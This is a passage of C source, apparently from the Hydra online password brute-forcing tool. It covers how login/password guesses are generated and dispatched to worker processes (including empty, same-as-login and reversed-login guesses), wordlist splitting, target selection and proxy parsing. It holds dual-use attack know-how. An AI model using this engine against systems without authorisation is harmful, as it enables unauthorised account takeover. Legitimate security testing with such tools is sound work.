will be retried at the end: ip %s - login %s - \"\n \"pass %s - child %d\\n\",\n hydra_targets[target_no]->target, hydra_heads[head_no]->current_login_ptr, hydra_heads[head_no]->current_pass_ptr, head_no);\n hydra_heads[head_no]->current_login_ptr = empty_login;\n hydra_heads[head_no]->current_pass_ptr = empty_login;\n }\n /*\n hydra_targets[target_no]->fail_count--;\n if (k < 5 && hydra_targets[target_no]->ok)\n hydra_targets[target_no]->fail_count--;\n if (k == 2 && hydra_targets[target_no]->ok)\n hydra_targets[target_no]->fail_count--;\n */\n if (hydra_brains.targets <= hydra_brains.finished)\n hydra_kill_head(head_no, 1, 0);\n else {\n hydra_kill_head(head_no, 1, 2);\n if (verbose)\n printf(\"[VERBOSE] Disabled child %d because of too many errors\\n\", head_no);\n }\n }\n } else {\n hydra_kill_head(head_no, 1, 1);\n if (verbose)\n printf(\"[VERBOSE] Retrying connection for child %d\\n\", head_no);\n }\n}\n\nchar *hydra_reverse_login(int32_t head_no, char *login) {\n int32_t i, j;\n char *start, *pos;\n unsigned char keep;\n\n if (login == NULL || (j = strlen(login)) < 1)\n return empty_login;\n\n if (j > 248)\n j = 248;\n\n for (i = 0; i < j; i++)\n hydra_heads[head_no]->reverse[i] = login[j - (i + 1)];\n hydra_heads[head_no]->reverse[j] = 0;\n\n // UTF stuff now\n start = hydra_heads[head_no]->reverse;\n pos = start + j;\n\n while (start < --pos) {\n switch ((*pos & 0xF0) >> 4) {\n case 0xF: /* U+010000-U+10FFFF: four bytes. */\n keep = *pos;\n *pos = *(pos - 3);\n *(pos - 3) = keep;\n keep = *(pos - 1);\n *(pos - 1) = *(pos - 2);\n *(pos - 2) = keep;\n pos -= 3;\n break;\n case 0xE: /* U+000800-U+00FFFF: three bytes. */\n keep = *pos;\n *pos = *(pos - 2);\n *(pos - 2) = keep;\n pos -= 2;\n break;\n case 0xC: /* fall-through */\n case 0xD: /* U+000080-U+0007FF: two bytes. */\n keep = *pos;\n *pos = *(pos - 1);\n *(pos - 1) = keep;\n pos--;\n break;\n }\n }\n\n return hydra_heads[head_no]->reverse;\n}\n\nvoid delete_junk_files() { remove(junk_file); }\n\nFILE *hydra_divide_file(FILE *file, uint32_t my_segment, uint32_t num_segments) {\n if (my_segment > num_segments) {\n fprintf(stderr, \"[ERROR] in option -D XofY, X must not be greater than Y: %s\\n\", hydra_options.passfile);\n return NULL;\n }\n\n FILE *output_file;\n char line[500];\n char output_file_name[50];\n\n uint32_t line_number = 0;\n\n double total_lines = countlines(file, 0);\n\n if (num_segments > total_lines) {\n fprintf(stderr, \"[ERROR] in option -D XofY, Y must not be greater than the total number of lines in the file to be divided: %s\\n\", hydra_options.passfile);\n return NULL;\n }\n\n double segment_size_double = total_lines / num_segments;\n\n // round up segment_size_float to integer\n uint64_t segment_size = (uint64_t)segment_size_double;\n if (segment_size < segment_size_double)\n segment_size++;\n\n uint64_t segment_start = segment_size * (my_segment - 1) + 1;\n uint64_t segment_end = segment_size * my_segment;\n\n srand(time(NULL));\n int filetag = rand();\n\n sprintf(output_file_name, \"segment_%d_%d.txt\", filetag, my_segment);\n output_file = fopen(output_file_name, \"w\");\n\n if (!output_file) {\n fprintf(stderr, \"[ERROR] Segment file empty: %s\\n\", hydra_options.passfile);\n return NULL;\n }\n\n strcpy(junk_file, output_file_name);\n\n atexit(delete_junk_files);\n\n while (fgets(line, sizeof line, file) != NULL && line_number < segment_end) {\n line_number++;\n\n if (line_number >= segment_start && line_number <= segment_end)\n fprintf(output_file, \"%s\", line);\n }\n\n rewind(file);\n fclose(output_file);\n output_file = fopen(output_file_name, \"r\");\n\n return output_file;\n}\n\nint32_t hydra_send_next_pair(int32_t target_no, int32_t head_no) {\n // variables moved to save stack\n snpdone = 0;\n snp_is_redo = 0;\n snpdont = 0;\n loop_cnt++;\n if (hydra_heads[head_no]->redo == 1 && hydra_heads[head_no]->current_login_ptr != NULL && hydra_heads[head_no]->current_pass_ptr != NULL) {\n hydra_heads[head_no]->redo = 0;\n snp_is_redo = 1;\n snpdone = 1;\n } else {\n if (hydra_targets[target_no]->sent >= hydra_brains.todo + hydra_targets[target_no]->redo) {\n if (hydra_targets[target_no]->done == TARGET_ACTIVE) {\n hydra_targets[target_no]->done = TARGET_FINISHED;\n hydra_brains.finished++;\n if (verbose)\n printf(\"[STATUS] attack finished for %s (waiting for children to \"\n \"complete tests)\\n\",\n hydra_targets[target_no]->target);\n }\n return -1;\n }\n }\n\n if (debug)\n printf(\"[DEBUG] send_next_pair_init target %d, head %d, redo %d, \"\n \"redo_state %d, pass_state %d. loop_mode %d, curlogin %s, curpass \"\n \"%s, tlogin %s, tpass %s, logincnt %\" hPRIu64 \"/%\" hPRIu64 \", passcnt %\" hPRIu64 \"/%\" hPRIu64 \", loop_cnt %d\\n\",\n target_no, head_no, hydra_targets[target_no]->redo, hydra_targets[target_no]->redo_state, hydra_targets[target_no]->pass_state, hydra_options.loop_mode, hydra_heads[head_no]->current_login_ptr, hydra_heads[head_no]->current_pass_ptr, hydra_targets[target_no]->login_ptr, hydra_targets[target_no]->pass_ptr, hydra_targets[target_no]->login_no, hydra_brains.countlogin, hydra_targets[target_no]->pass_no, hydra_brains.countpass, loop_cnt);\n\n if (loop_cnt > (hydra_brains.countlogin * 2) + 1 && loop_cnt > (hydra_brains.countpass * 2) + 1) {\n if (debug)\n printf(\"[DEBUG] too many loops in send_next_pair, returning -1 (loop_cnt \"\n \"%d, sent %\" hPRIu64 \", todo %\" hPRIu64 \")\\n\",\n loop_cnt, hydra_targets[target_no]->sent, hydra_brains.todo);\n return -1;\n }\n\n if (hydra_heads[head_no]->redo == 1 && hydra_heads[head_no]->current_login_ptr != NULL && hydra_heads[head_no]->current_pass_ptr != NULL) {\n hydra_heads[head_no]->redo = 0;\n snp_is_redo = 1;\n snpdone = 1;\n } else {\n if (debug && (hydra_heads[head_no]->current_login_ptr != NULL || hydra_heads[head_no]->current_pass_ptr != NULL))\n printf(\"[COMPLETED] target %s - login \\\"%s\\\" - pass \\\"%s\\\" - child %d - \"\n \"%\" hPRIu64 \" of %\" hPRIu64 \"\\n\",\n hydra_targets[target_no]->target, hydra_heads[head_no]->current_login_ptr, hydra_heads[head_no]->current_pass_ptr, head_no, hydra_targets[target_no]->sent, hydra_brains.todo + hydra_targets[target_no]->redo);\n // hydra_heads[head_no]->redo = 0;\n if (hydra_targets[target_no]->redo_state > 0) {\n if (hydra_targets[target_no]->redo_state <= hydra_targets[target_no]->redo) {\n hydra_heads[head_no]->current_pass_ptr = hydra_targets[target_no]->redo_pass[hydra_targets[target_no]->redo_state - 1];\n hydra_heads[head_no]->current_login_ptr = hydra_targets[target_no]->redo_login[hydra_targets[target_no]->redo_state - 1];\n hydra_targets[target_no]->redo_state++;\n snpdone = 1;\n } else {\n // if a pair does not complete after this point it is lost\n if (hydra_targets[target_no]->done == TARGET_ACTIVE) {\n hydra_targets[target_no]->done = TARGET_FINISHED;\n hydra_brains.finished++;\n if (verbose)\n printf(\"[STATUS] attack finished for %s (waiting for children to \"\n \"complete tests)\\n\",\n hydra_targets[target_no]->target);\n }\n loop_cnt = 0;\n return -1;\n }\n } else { // normale state, no redo\n if (hydra_targets[target_no]->done != TARGET_ACTIVE) {\n loop_cnt = 0;\n return -1; // head will be disabled by main while()\n }\n if (hydra_options.loop_mode == 0) { // one user after another\n if (hydra_targets[target_no]->login_no < hydra_brains.countlogin) {\n // as we loop password in mode == 0 we set the current login first\n hydra_heads[head_no]->current_login_ptr = hydra_targets[target_no]->login_ptr;\n // then we do the extra options -e ns handling\n if (hydra_targets[target_no]->pass_state == 0 && snpdone == 0) {\n if (hydra_options.try_password_same_as_login) {\n hydra_heads[head_no]->current_pass_ptr = hydra_targets[target_no]->login_ptr;\n snpdone = 1;\n hydra_targets[target_no]->pass_no++;\n }\n hydra_targets[target_no]->pass_state++;\n }\n if (hydra_targets[target_no]->pass_state == 1 && snpdone == 0) {\n // small check that there is a login name (could also be emtpy) and\n // if we already tried empty password it would be a double\n if (hydra_options.try_null_password) {\n if (hydra_options.try_password_same_as_login == 0 || (hydra_targets[target_no]->login_ptr != NULL && strlen(hydra_targets[target_no]->login_ptr) > 0)) {\n hydra_heads[head_no]->current_pass_ptr = empty_login;\n snpdone = 1;\n } else {\n hydra_brains.sent++;\n hydra_targets[target_no]->sent++;\n }\n hydra_targets[target_no]->pass_no++;\n }\n hydra_targets[target_no]->pass_state++;\n }\n if (hydra_targets[target_no]->pass_state == 2 && snpdone == 0) {\n // small check that there is a login name (could also be emtpy) and\n // if we already tried empty password it would be a double\n if (hydra_options.try_password_reverse_login) {\n if ((hydra_options.try_password_same_as_login == 0 || strcmp(hydra_targets[target_no]->login_ptr, hydra_reverse_login(head_no, hydra_heads[head_no]->current_login_ptr)) != 0) && (hydra_options.try_null_password == 0 || (hydra_targets[target_no]->login_ptr != NULL && strlen(hydra_targets[target_no]->login_ptr) > 0))) {\n hydra_heads[head_no]->current_pass_ptr = hydra_reverse_login(head_no, hydra_heads[head_no]->current_login_ptr);\n snpdone = 1;\n } else {\n hydra_brains.sent++;\n hydra_targets[target_no]->sent++;\n }\n hydra_targets[target_no]->pass_no++;\n }\n hydra_targets[target_no]->pass_state++;\n }\n // now we handle the -C -l/-L -p/-P data\n if (hydra_targets[target_no]->pass_state == 3 && snpdone == 0) {\n if (check_flag(hydra_options.mode, MODE_COLON_FILE)) { // colon mode\n hydra_heads[head_no]->current_login_ptr = hydra_targets[target_no]->login_ptr;\n hydra_heads[head_no]->current_pass_ptr = hydra_targets[target_no]->pass_ptr;\n hydra_targets[target_no]->login_no++;\n snpdone = 1;\n hydra_targets[target_no]->login_ptr = hydra_targets[target_no]->pass_ptr;\n // hydra_targets[target_no]->login_ptr++;\n while (*hydra_targets[target_no]->login_ptr != 0)\n hydra_targets[target_no]->login_ptr++;\n hydra_targets[target_no]->login_ptr++;\n hydra_targets[target_no]->pass_ptr = hydra_targets[target_no]->login_ptr;\n // hydra_targets[target_no]->pass_ptr++;\n while (*hydra_targets[target_no]->pass_ptr != 0)\n hydra_targets[target_no]->pass_ptr++;\n hydra_targets[target_no]->pass_ptr++;\n if (strcmp(hydra_targets[target_no]->login_ptr, hydra_heads[head_no]->current_login_ptr) != 0)\n hydra_targets[target_no]->pass_state = 0;\n if ((hydra_options.try_password_same_as_login && strcmp(hydra_heads[head_no]->current_pass_ptr, hydra_heads[head_no]->current_login_ptr) == 0) || (hydra_options.try_null_password && strlen(hydra_heads[head_no]->current_pass_ptr) == 0) || (hydra_options.try_password_reverse_login && strcmp(hydra_heads[head_no]->current_pass_ptr, hydra_reverse_login(head_no, hydra_heads[head_no]->current_login_ptr)) == 0)) {\n hydra_brains.sent++;\n hydra_targets[target_no]->sent++;\n if (debug)\n printf(\"[DEBUG] double detected (-C)\\n\");\n return hydra_send_next_pair(target_no, head_no); // little trick to keep the code small\n }\n } else { // standard -l -L -p -P mode\n hydra_heads[head_no]->current_pass_ptr = hydra_targets[target_no]->pass_ptr;\n hydra_targets[target_no]->pass_no++;\n // double check\n if (hydra_targets[target_no]->pass_no >= hydra_brains.countpass) {\n // all passwords done, next user for next password\n hydra_targets[target_no]->login_ptr++;\n while (*hydra_targets[target_no]->login_ptr != 0)\n hydra_targets[target_no]->login_ptr++;\n hydra_targets[target_no]->login_ptr++;\n hydra_targets[target_no]->pass_ptr = pass_ptr;\n hydra_targets[target_no]->login_no++;\n hydra_targets[target_no]->pass_no = 0;\n hydra_targets[target_no]->pass_state = 0;\n if (hydra_brains.countpass == hydra_options.try_password_reverse_login + hydra_options.try_null_password + hydra_options.try_password_same_as_login)\n return hydra_send_next_pair(target_no, head_no);\n } else {\n hydra_targets[target_no]->pass_ptr++;\n while (*hydra_targets[target_no]->pass_ptr != 0)\n hydra_targets[target_no]->pass_ptr++;\n hydra_targets[target_no]->pass_ptr++;\n }\n if ((hydra_options.try_password_same_as_login && strcmp(hydra_heads[head_no]->current_pass_ptr, hydra_heads[head_no]->current_login_ptr) == 0) || (hydra_options.try_null_password && strlen(hydra_heads[head_no]->current_pass_ptr) == 0) || (hydra_options.try_password_reverse_login && strcmp(hydra_heads[head_no]->current_pass_ptr, hydra_reverse_login(head_no, hydra_heads[head_no]->current_login_ptr)) == 0)) {\n hydra_brains.sent++;\n hydra_targets[target_no]->sent++;\n if (debug)\n printf(\"[DEBUG] double detected (-Pp)\\n\");\n return hydra_send_next_pair(target_no, head_no); // little trick to keep the code small\n }\n snpdone = 1;\n }\n }\n }\n } else { // loop_mode == 1\n if (hydra_targets[target_no]->pass_no < hydra_brains.countpass) {\n hydra_heads[head_no]->current_login_ptr = hydra_targets[target_no]->login_ptr;\n if (hydra_targets[target_no]->pass_state == 0) {\n if (check_flag(hydra_options.mode, MODE_PASSWORD_BRUTE))\n hydra_heads[head_no]->current_pass_ptr = strdup(hydra_heads[head_no]->current_login_ptr);\n else\n hydra_heads[head_no]->current_pass_ptr = hydra_heads[head_no]->current_login_ptr;\n } else if (hydra_targets[target_no]->pass_state == 1) {\n if (check_flag(hydra_options.mode, MODE_PASSWORD_BRUTE))\n hydra_heads[head_no]->current_pass_ptr = strdup(empty_login);\n else\n hydra_heads[head_no]->current_pass_ptr = empty_login;\n } else if (hydra_targets[target_no]->pass_state == 2) {\n if (check_flag(hydra_options.mode, MODE_PASSWORD_BRUTE))\n hydra_heads[head_no]->current_pass_ptr = strdup(hydra_reverse_login(head_no, hydra_heads[head_no]->current_login_ptr));\n else\n hydra_heads[head_no]->current_pass_ptr = hydra_reverse_login(head_no, hydra_heads[head_no]->current_login_ptr);\n } else {\n if (hydra_options.bfg && hydra_targets[target_no]->pass_state == 3 && hydra_heads[head_no]->current_pass_ptr != NULL && strlen(hydra_heads[head_no]->current_pass_ptr) > 0 && hydra_heads[head_no]->current_pass_ptr != hydra_heads[head_no]->current_login_ptr)\n free(hydra_heads[head_no]->current_pass_ptr);\n hydra_heads[head_no]->current_pass_ptr = strdup(hydra_targets[target_no]->pass_ptr);\n }\n hydra_targets[target_no]->login_no++;\n snpdone = 1;\n\n if (hydra_targets[target_no]->login_no >= hydra_brains.countlogin) {\n if (hydra_targets[target_no]->pass_state < 3) {\n hydra_targets[target_no]->pass_state++;\n if (hydra_targets[target_no]->pass_state == 1 && hydra_options.try_null_password == 0)\n hydra_targets[target_no]->pass_state++;\n if (hydra_targets[target_no]->pass_state == 2 && hydra_options.try_password_reverse_login == 0)\n hydra_targets[target_no]->pass_state++;\n if (hydra_targets[target_no]->pass_state == 3)\n snpdont = 1;\n hydra_targets[target_no]->pass_no++;\n }\n\n if (hydra_targets[target_no]->pass_state == 3) {\n if (snpdont) {\n hydra_targets[target_no]->pass_ptr = pass_ptr;\n } else {\n if (check_flag(hydra_options.mode, MODE_PASSWORD_BRUTE)) {\n#ifndef HAVE_MATH_H\n sleep(1);\n#else\n hydra_targets[target_no]->pass_ptr = bf_next();\n if (debug)\n printf(\"[DEBUG] bfg new password for next child: %s\\n\", hydra_targets[target_no]->pass_ptr);\n#endif\n } else { // -p -P mode\n hydra_targets[target_no]->pass_ptr++;\n while (*hydra_targets[target_no]->pass_ptr != 0)\n hydra_targets[target_no]->pass_ptr++;\n hydra_targets[target_no]->pass_ptr++;\n }\n hydra_targets[target_no]->pass_no++;\n }\n }\n\n hydra_targets[target_no]->login_no = 0;\n hydra_targets[target_no]->login_ptr = login_ptr;\n } else {\n hydra_targets[target_no]->login_ptr++;\n while (*hydra_targets[target_no]->login_ptr != 0)\n hydra_targets[target_no]->login_ptr++;\n hydra_targets[target_no]->login_ptr++;\n }\n if (hydra_targets[target_no]->pass_state == 3 && snpdont == 0) {\n if ((hydra_options.try_null_password && strlen(hydra_heads[head_no]->current_pass_ptr) < 1) || (hydra_options.try_password_same_as_login && strcmp(hydra_heads[head_no]->current_pass_ptr, hydra_heads[head_no]->current_login_ptr) == 0) || (hydra_options.try_password_reverse_login && strcmp(hydra_heads[head_no]->current_login_ptr, hydra_heads[head_no]->current_pass_ptr) == 0)) {\n hydra_brains.sent++;\n hydra_targets[target_no]->sent++;\n if (debug)\n printf(\"[DEBUG] double detected (1)\\n\");\n return hydra_send_next_pair(target_no, head_no); // little trick to keep the code small\n }\n }\n }\n }\n }\n\n if (debug)\n printf(\"[DEBUG] send_next_pair_mid done %d, pass_state %d, clogin %s, \"\n \"cpass %s, tlogin %s, tpass %s, redo %d\\n\",\n snpdone, hydra_targets[target_no]->pass_state, hydra_heads[head_no]->current_login_ptr, hydra_heads[head_no]->current_pass_ptr, hydra_targets[target_no]->login_ptr, hydra_targets[target_no]->pass_ptr, hydra_targets[target_no]->redo);\n\n // no pair? then we go for redo state\n if (!snpdone && hydra_targets[target_no]->redo_state == 0 && hydra_targets[target_no]->redo > 0) {\n if (debug)\n printf(\"[DEBUG] Entering redo_state\\n\");\n hydra_targets[target_no]->redo_state++;\n return hydra_send_next_pair(target_no, head_no); // little trick to keep the code small\n }\n }\n\n if (!snpdone || hydra_targets[target_no]->skipcnt >= hydra_brains.countlogin) {\n fck = write(hydra_heads[head_no]->sp[0], HYDRA_EXIT, sizeof(HYDRA_EXIT));\n if (hydra_targets[target_no]->use_count <= 1) {\n if (hydra_targets[target_no]->done == TARGET_ACTIVE) {\n hydra_targets[target_no]->done = TARGET_FINISHED;\n hydra_brains.finished++;\n if (verbose)\n printf(\"[STATUS] attack finished for %s (waiting for children to \"\n \"complete tests)\\n\",\n hydra_targets[target_no]->target);\n }\n }\n if (hydra_brains.targets > hydra_brains.finished)\n hydra_kill_head(head_no, 1, 0); // otherwise done in main while loop\n } else {\n if (hydra_targets[target_no]->skipcnt > 0) {\n snpj = 0;\n for (snpi = 0; snpi < hydra_targets[target_no]->skipcnt && snpj == 0; snpi++)\n if (strcmp(hydra_heads[head_no]->current_login_ptr, hydra_targets[target_no]->skiplogin[snpi]) == 0)\n snpj = 1;\n if (snpj) {\n if (snp_is_redo == 0) {\n hydra_brains.sent++;\n hydra_targets[target_no]->sent++;\n }\n if (debug)\n printf(\"[DEBUG] double found for %s == %s, skipping\\n\", hydra_heads[head_no]->current_login_ptr, hydra_targets[target_no]->skiplogin[snpi - 1]);\n // only if -l/L -p/P with -u and if loginptr was not justed increased\n if (!check_flag(hydra_options.mode, MODE_COLON_FILE) && hydra_options.loop_mode == 0 && hydra_targets[target_no]->pass_no > 0) { // -l -P (not! -u)\n // increase login_ptr to next\n hydra_targets[target_no]->login_no++;\n if (hydra_targets[target_no]->login_no < hydra_brains.countlogin) {\n hydra_targets[target_no]->login_ptr++;\n while (*hydra_targets[target_no]->login_ptr != 0)\n hydra_targets[target_no]->login_ptr++;\n hydra_targets[target_no]->login_ptr++;\n }\n // add count\n hydra_brains.sent += hydra_brains.countpass - hydra_targets[target_no]->pass_no;\n hydra_targets[target_no]->sent += hydra_brains.countpass - hydra_targets[target_no]->pass_no;\n // reset password list\n hydra_targets[target_no]->pass_ptr = pass_ptr;\n hydra_targets[target_no]->pass_no = 0;\n hydra_targets[target_no]->pass_state = 0;\n }\n return hydra_send_next_pair(target_no, head_no); // little trick to keep the code small\n }\n }\n\n memset(&snpbuf, 0, sizeof(snpbuf));\n strncpy(snpbuf, hydra_heads[head_no]->current_login_ptr, MAXLINESIZE - 3);\n if (strlen(hydra_heads[head_no]->current_login_ptr) > MAXLINESIZE - 3)\n snpbuflen = MAXLINESIZE - 2;\n else\n snpbuflen = strlen(hydra_heads[head_no]->current_login_ptr) + 1;\n strncpy(snpbuf + snpbuflen, hydra_heads[head_no]->current_pass_ptr, MAXLINESIZE - snpbuflen - 1);\n if (strlen(hydra_heads[head_no]->current_pass_ptr) > MAXLINESIZE - snpbuflen - 1)\n snpbuflen += MAXLINESIZE - snpbuflen - 1;\n else\n snpbuflen += strlen(hydra_heads[head_no]->current_pass_ptr) + 1;\n if (snp_is_redo == 0) {\n hydra_brains.sent++;\n hydra_targets[target_no]->sent++;\n } else if (debug)\n printf(\"[DEBUG] send_next_pair_redo done %d, pass_state %d, clogin %s, \"\n \"cpass %s, tlogin %s, tpass %s, is_redo %d\\n\",\n snpdone, hydra_targets[target_no]->pass_state, hydra_heads[head_no]->current_login_ptr, hydra_heads[head_no]->current_pass_ptr, hydra_targets[target_no]->login_ptr, hydra_targets[target_no]->pass_ptr, snp_is_redo);\n // hydra_dump_data(snpbuf, snpbuflen, \"SENT\");\n fck = write(hydra_heads[head_no]->sp[0], snpbuf, snpbuflen);\n if (fck < snpbuflen) {\n if (verbose)\n fprintf(stderr, \"[ERROR] can not write to child %d, restarting it ...\\n\", head_no);\n hydra_increase_fail_count(target_no, head_no);\n loop_cnt = 0;\n return 0; // not prevent disabling it, if its needed its already done in\n // the above line\n }\n if (debug || hydra_options.showAttempt) {\n printf(\"[%sATTEMPT] target %s - login \\\"%s\\\" - pass \\\"%s\\\" - %\" hPRIu64 \" of %\" hPRIu64 \" [child %d] (%d/%d)\\n\",\n hydra_targets[target_no]->redo_state ? \"REDO-\"\n : snp_is_redo ? \"RE-\"\n : \"\",\n hydra_targets[target_no]->target, hydra_heads[head_no]->current_login_ptr, hydra_heads[head_no]->current_pass_ptr, hydra_targets[target_no]->sent, hydra_brains.todo + hydra_targets[target_no]->redo, head_no, hydra_targets[target_no]->redo_state ? hydra_targets[target_no]->redo_state - 1 : 0, hydra_targets[target_no]->redo);\n }\n loop_cnt = 0;\n return 0;\n }\n loop_cnt = 0;\n return -1;\n}\n\nvoid hydra_skip_user(int32_t target_no, char *username) {\n int32_t i;\n\n if (username == NULL || *username == 0)\n return;\n\n // double check\n for (i = 0; i < hydra_targets[target_no]->skipcnt; i++)\n if (strcmp(username, hydra_targets[target_no]->skiplogin[i]) == 0)\n return;\n\n if (hydra_targets[target_no]->skipcnt < SKIPLOGIN && (hydra_targets[target_no]->skiplogin[hydra_targets[target_no]->skipcnt] = malloc(strlen(username) + 1)) != NULL) {\n strcpy(hydra_targets[target_no]->skiplogin[hydra_targets[target_no]->skipcnt], username);\n hydra_targets[target_no]->skipcnt++;\n }\n if (hydra_options.loop_mode == 0 && !check_flag(hydra_options.mode, MODE_COLON_FILE)) {\n if (strcmp(username, hydra_targets[target_no]->login_ptr) == 0) {\n if (debug)\n printf(\"[DEBUG] skipping username %s\\n\", username);\n // increase count\n hydra_brains.sent += hydra_brains.countpass - hydra_targets[target_no]->pass_no;\n hydra_targets[target_no]->sent += hydra_brains.countpass - hydra_targets[target_no]->pass_no;\n // step to next login\n hydra_targets[target_no]->login_no++;\n if (hydra_targets[target_no]->login_no < hydra_brains.countlogin) {\n hydra_targets[target_no]->login_ptr++;\n while (*hydra_targets[target_no]->login_ptr != 0)\n hydra_targets[target_no]->login_ptr++;\n hydra_targets[target_no]->login_ptr++;\n }\n // reset password state\n hydra_targets[target_no]->pass_ptr = pass_ptr;\n hydra_targets[target_no]->pass_no = 0;\n hydra_targets[target_no]->pass_state = 0;\n }\n }\n}\n\nint32_t hydra_check_for_exit_condition() {\n int32_t i, k = 0;\n\n if (hydra_brains.exit) {\n if (debug)\n printf(\"[DEBUG] exit was forced\\n\");\n return -1;\n }\n if (hydra_brains.targets <= hydra_brains.finished && hydra_brains.active < 1) {\n if (debug)\n printf(\"[DEBUG] all targets done and all heads finished\\n\");\n return 1;\n }\n if (hydra_brains.active < 1) {\n // no head active?! check if they are all disabled, if so, we are done\n for (i = 0; i < hydra_options.max_use && k == 0; i++)\n if (hydra_heads[i]->active >= HEAD_UNUSED)\n k = 1;\n if (k == 0) {\n fprintf(stderr, \"[ERROR] all children were disabled due too many \"\n \"connection errors\\n\");\n return -1;\n }\n }\n return 0;\n}\n\nint32_t hydra_select_target() {\n int32_t target_no = -1, i, j = -1000;\n\n for (i = 0; i < hydra_brains.targets; i++)\n if (hydra_targets[i]->use_count < hydra_options.tasks && hydra_targets[i]->done == TARGET_ACTIVE)\n if (j < hydra_options.tasks - hydra_targets[i]->failed - hydra_targets[i]->use_count) {\n target_no = i;\n j = hydra_options.tasks - hydra_targets[i]->failed - hydra_targets[i]->use_count;\n }\n return target_no;\n}\n\nvoid process_proxy_line(int32_t type, char *string) {\n char *type_string = string, *target_string, *port_string, *auth_string = NULL, *device_string = NULL, *sep;\n int32_t port;\n struct addrinfo hints, *res, *p;\n struct sockaddr_in6 *ipv6 = NULL;\n struct sockaddr_in *ipv4 = NULL;\n\n if (string == NULL || string[0] == 0 || string[0] == '#')\n return;\n while (*string == ' ' || *string == '\\t')\n string++;\n if (*string == '#' || *string == ';' || strlen(string) < 5)\n return;\n if (string[strlen(string) - 1] == '\\n')\n string[strlen(string) - 1] = 0;\n if (string[strlen(string) - 1] == '\\r')\n string[strlen(string) - 1] = 0;\n if (proxy_count >= MAX_PROXY_COUNT) {\n fprintf(stderr, \"[WARNING] maximum amount of proxies loaded, ignoring this entry: %s\\n\", string);\n return;\n }\n if (debug)\n printf(\"[DEBUG] proxy line: %s\\n\", string);\n if ((sep = strstr(string, \"://\")) == NULL) {\n fprintf(stderr, \"[WARNING] invalid proxy definition: %s (ignored)\\n\", string);\n return;\n }\n *sep = 0;\n target_string = sep + 3;\n if ((sep = strchr(target_string, '@')) != NULL) {\n auth_string = target_string;\n *sep = 0;\n target_string = sep + 1;\n if (strchr(auth_string, ':') == NULL) {\n fprintf(stderr,\n \"[WARNING] %s has an invalid authentication definition %s, must \"\n \"be in the format login:pass, entry ignored\\n\",\n target_string, auth_string);\n return;\n }\n }\n if ((sep = strchr(target_string, ':')) != NULL) {\n *sep = 0;\n port_string = sep + 1;\n if ((sep = strchr(port_string, '%')) != NULL) {\n *sep = 0;\n device_string = sep + 1;\n }\n if ((sep = strchr(port_string, '/')) != NULL)\n *sep = 0;\n port = atoi(port_string);\n if (port < 1 || port > 65535) {\n fprintf(stderr, \"[WARNING] %s has an invalid port definition %d, entry ignored\\n\", target_string, port);\n return;\n }\n } else {\n fprintf(stderr,\n \"[WARNING] %s has not port definition which is required, entry \"\n \"ignored\\n\",\n target_string);\n return;\n }\n\n if (use_proxy == 1 && strcmp(type_string, \"http\") != 0) {\n fprintf(stderr,\n \"[WARNING] %s:// is an invalid type, must be http:// if you use \"\n \"HYDRA_PROXY_HTTP, entry ignored\\n\",\n type_string);\n return;\n }\n if (use_proxy == 2 && strcmp(type_string, \"connect\") != 0 && strcmp(type_string, \"socks4\") != 0 && strcmp(type_string, \"socks5\") != 0) {\n fprintf(stderr,\n \"[WARNING] %s:// is an invalid type, must be connect://, socks4:// \"\n \"or socks5:// if you use HYDRA_PROXY, entry ignored\\n\",\n type_string);\n return;\n }\n\n memset(&hints, 0, sizeof hints);\n if (getaddrinfo(target_string, NULL, &hints, &res) != 0) {\n fprintf(stderr, \"[ERROR] could not resolve proxy target %s, entry ignored\\n\", target_string);\n return;\n }\n\n for (p = res; p != NULL; p = p->ai_next) {\n#ifdef AF_INET6\n if (p->ai_family == AF_INET6) {\n if (ipv6 == NULL || memcmp((char *)&ipv6->sin6_addr, fe80, 2) == 0)\n ipv6 = (struct sockaddr_in6 *)p->ai_addr;\n } else\n#endif\n if (p->ai_family == AF_INET) {\n if (ipv4 == NULL)\n ipv4 = (struct sockaddr_in *)p->ai_addr;\n }\n }\n freeaddrinfo(res);\n\n // now fill the stuff\n#ifdef AF_INET6\n if (ipv6 != NULL && (ipv4 == NULL || prefer_ipv6)) {\n if (memcmp(proxy_string_ip[proxy_count] + 1, fe80, 2) == 0 && device_string == NULL) {\n fprintf(stderr,\n \"[WARNING] The proxy address %s is a link local address, link \"\n \"local addresses require the interface being defined like this: \"\n \"fe80::1%%eth0, entry ignored\\n\",\n target_string);\n return;\n }\n proxy_string_ip[proxy_count][0] = 16;\n memcpy(proxy_string_ip[proxy_count] + 1, (char *)&ipv6->sin6_addr, 16);\n if (device_string != NULL && strlen(device_string) <= 16)\n strcpy(proxy_string_ip[proxy_count] + 17, device_string);\n } else\n#endif\n if (ipv4 != NULL) {\n proxy_string_ip[proxy_count][0] = 4;\n memcpy(proxy_string_ip[proxy_count] + 1, (char *)&ipv4->sin_addr, 4);\n } else {\n fprintf(stderr, \"[WARNING] Could not resolve proxy address: %s, entry ignored\\n\", target_string);\n return;\n }\n if (auth_string != NULL) {\n if ((proxy_authentication[proxy_count] = malloc(strlen(auth_string) * 2 + 8)) == NULL) {\n perror(\"malloc\");\n return;\n }\n strcpy(proxy_authentication[proxy_count], auth_string);\n if (strncmp(type_string, \"socks\", 5) != 0) // so it is web\n hydra_tobase64((unsigned char *)proxy_authentication[proxy_count], strlen(proxy_authentication[proxy_count]), strlen(auth_string) * 2 + 8);\n } else\n proxy_authentication[proxy_count] = NULL;\n strcpy(proxy_string_type[proxy_count], type_string);\n proxy_string_port[proxy_count] = port;\n\n if (debug)\n printf(\"[DEBUG] count %d type %s target %s port %d auth %s\\n\", proxy_count, proxy_string_type[proxy_count], target_string, proxy_string_port[proxy_count], proxy_authentication[proxy_count]);\n proxy_count++;\n}\n\nint main(int argc, char *argv[]) {\n char *proxy_string = NULL, *device = NULL, *memcheck;\n char *outfile_format_tmp;\n FILE *lfp = NULL, *pfp = NULL, *cfp = NULL, *ifp = NULL, *rfp = NULL, *proxyfp, *filecloser = NULL;\n size_t countinfile = 1, sizeinfile = 0;\n uint64_t math2;\n int32_t i = 0, j = 0, k, error = 0, modusage = 0, ignore_restore = 0, do_switch;\n int32_t head_no = 0, target_no = 0, exit_condition = 0, readres;\n time_t starttime, elapsed_status, elapsed_restore, status_print = 59, tmp_time;\n char *tmpptr, *tmpptr2, *tmpptr3;\n char rc, buf[MAXBUF];\n time_t last_attempt = 0;\n fd_set fdreadheads;\n int32_t max_fd;\n struct addrinfo hints, *res, *p;\n struct sockaddr_in6 *ipv6 = NULL;\n struct sockaddr_in *ipv4 = NULL;\n\n printf(\"%s %s (c) 2023 